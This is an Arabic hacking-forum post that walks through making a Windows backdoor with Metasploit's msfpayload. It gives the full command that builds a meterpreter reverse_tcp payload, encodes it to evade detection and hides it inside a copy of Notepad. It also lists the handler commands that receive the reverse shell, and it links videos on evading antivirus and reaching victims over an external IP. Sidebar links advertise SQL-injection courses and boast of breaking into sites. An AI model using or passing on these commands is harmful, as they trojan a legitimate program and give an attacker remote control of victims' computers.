1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

شرح backtrack backdoor's "msfpayload"

الموضوع في 'الـقـسـم الـعـام' بواسطة .:: RSS ::., بتاريخ ‏1 أغسطس 2012.

كاتب الموضوع : .:: RSS ::. المشاهدات : 2,032 الردود : 0 ‏1 أغسطس 2012
حالة الموضوع:
مغلق
  1. غير متصل

    .:: RSS ::. عضوية آلية

    عضو منذ:
    ‏9 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    بسم الله الرحمن الرحيم


    نبذة بسيطة عن طريقة عمل msfpayload لـصنع backdoor exe


    \
    /
    \
    /


    لتشغيل الاداة نطبق الأمر msfpayload

    [​IMG]


    -------------------


    طريقة العمل :

    [​IMG]


    الأمر المستخدم :


    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE


    اجزاء مهم من الامر لزم نتعرف عليها ..

    msfpayload هو أمر تشغيل الاداة

    windows/meterpreter/reverse_tcp مسار ونوع الشل المستخدم

    LHOST=192.168.8.92 عنوان المستخدم ( attacker ip )

    LPORT=443 عنوان البورت ( port )


    -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE


    نوع صيغة الملف والي هي EXE أسم الملف ومسار تخزين او حفظه /root/Desktop/NOTEPAD2.EXE


    تم تكوين NOTEPAD.EXE بنجاح ..


    ------------------------


    * عملية التصنت أو بالاصح handler


    طريق عمل handler بسيطه جـدا

    [​IMG]


    الاوامر المستخدمة :

    msf > use exploit/multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp

    msf exploit(handler) > set LHOST 192.168.8.92
    LHOST => 192.168.8.92

    msf exploit(handler) > set LPORT 443 LPORT => 443
    LPORT => 443

    msf exploit(handler) > exploit


    نتعرف على الاوامر بشكل سريع :


    use exploit/multi/handler لستخدام الـ handler

    set PAYLOAD windows/meterpreter/reverse_tcp لظبط الشل

    set LHOST 192.168.8.92 لظبط الايبي

    set LPORT 443 LPORT => 443 لظبط البورت

    exploit تنقيذ

    ----------------------


    الان نفتح ملف NOTEPAD.EXE


    [​IMG]


    تم الأستغلال بنجاح ..



    ---------------------------------------------------------------


    شــروحات عامـة ( video )


    شرح طريقة الاختراق بواسطة ip خارجي من خوينا الأيماراتي j0k3rr :

    أظغط هنا



    شرح استعمال ( no-ip )

    أظغط هنا



    شرح طريقة التشفير بواسطة ( Vanish Script )

    أظغط هنا



    شرح طريقة التفشير عن كاسبر سكاي 2012

    أظغط هنا



    شرح التفشير بـأستخدام أداة PEscrambler

    أظغط هنا



    شرح للي مافهم 1 |11|

    اظغط هنا



    شرح للي مافهم 2 |11|
    اظغط هنا



    دعواتكم ,,
     


    جاري تحميل الصفحة...
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...